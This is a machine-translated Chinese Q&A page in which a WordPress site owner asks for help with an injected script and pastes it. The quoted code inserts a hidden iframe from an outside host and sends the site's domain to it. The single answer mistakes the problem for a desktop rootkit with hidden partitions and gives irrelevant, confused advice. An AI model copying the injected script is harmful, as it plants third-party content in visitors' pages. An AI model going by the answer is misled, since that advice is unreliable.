Question

您好我的网站上有恶意脚本，我无法在任何地方找到它！

我检查了检查员，它返回了这个：

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>

<script type="text/javascript">
    var relatedUrl = document.domain;
    var protocol = window.location.protocol;


    var idadv = document.createElement("iframe");
    with(idadv){
        id = "idadv";
        src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
        scrolling = "no";
    }   
    document.getElementById("menu-bar").appendChild(idadv);
</script>

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({
      trigger: $(".handle"),
      push: false,
      position: "right",
      width: 50,
      show: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
      },
      hidden: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
      },
    });

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div>

它位于＆＃34;菜单栏＆＃34;我的wordpress但我找不到任何东西！这样我的网站SSL证书就可以向我的客户显示我的网站！我简直不敢相信！

以下是网址：http://www.websiteladies.com

任何帮助？

Answer 1

我自己遇到过这个问题，可能需要几个小时才能摆脱它。
它将采用JavaScript或jQuery格式或VBS格式，至少部分是这样。它可能在HDD或外部USB的顶端创建了自己的分区，因此请检查您的分区。

它会将部分内容附加到注册表中，以便它知道您何时搜索它，只要你的在线，它就可以修复自己。它可以作为根套件启动，将其自身附加到文本或照片文件。

尝试下载Spybot SD，然后脱机并安装并运行该程序。如果病毒创建了它自己的分区，则必须找到它并完全擦除该分区，然后将其设置为它之前的分区的扩展。快速＆＃39;快速清洁＆＃39;不起作用，因为它只清理扇区标记。

我知道没有防病毒或spybot跟踪器会查看隐藏的分区，但是他们可以清理注册表并找到隐藏的rootkit。
试试记住你最近下载和安装的内容。
检查你插入的所有USB拇指驱动器。
我建议保持离线状态，直到您确定病毒的所有组件都消失为止。我有一个隐藏里面一个防病毒程序的组件。

Wordpress中的恶意脚本

1 个答案: